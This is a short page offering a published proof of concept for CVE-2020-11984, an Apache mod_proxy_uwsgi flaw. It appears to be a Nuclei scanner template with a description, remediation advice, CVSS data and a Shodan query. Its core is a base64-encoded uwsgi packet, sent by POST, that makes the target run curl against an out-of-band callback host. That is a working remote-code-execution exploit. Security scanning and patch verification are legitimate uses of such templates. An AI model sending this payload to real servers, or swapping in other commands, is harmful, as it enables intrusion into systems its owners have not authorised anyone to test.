Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
PoC代码[已公开]
id: CVE-2020-11984
info:
name: Apache HTTP Server - Remote Code Execution
author: wofeiwo@80sec.com,pszyszkowski,pdresearch,iamnoooob
severity: critical
description: |
Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
remediation: |
Update to >= 2.4.45
reference:
- https://github.com/RubenBar/MLW-upcrans/tree/main/1.Exploit
- https://nvd.nist.gov/vuln/detail/cve-2020-11984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11984
cwe-id: CWE-120
epss-score: 0.80216
epss-percentile: 0.99084
metadata:
verified: true
max-request: 1
vendor: apache
product: http_server
shodan-query: cpe:"cpe:2.3:a:apache:http_server"
tags: cve,cve2020,apache,httpd,rce
variables:
oast: ".{{interactsh-url}}"
payload: "{{padding(oast,'a',54,'prefix')}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{replace(base64_decode('AHIAAAoAVVdTR0lfRklMRUsAZXhlYzovL2N1cmwgYWFhYWFhYWEuZmw0NGhoY240NHEydWtsdjI5YnB6dTR1amxwY2QzM3JzLm9hc3RpZnkuY29tOyBlY2hvICIiCwBTQ1JJUFRfTkFNRQoAL3BlbmV0cmF0ZQ=='),'aaaaaaaa.fl44hhcn44q2uklv29bpzu4ujlpcd33rs.oastify.com',payload)}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'contains(interactsh_request, "User-Agent: curl")'
condition: and
# digest: 4a0a00473045022100f589cbcb345c224cc8cd7775e07cfd3c205e366b6ffcd72cba8c4517eb13b61102202f2d596be1999799f5c94ce7bd146ae1920b9e9773fe1f943f277c2b90d63cef:922c64590222798bb761d5b6d8e72950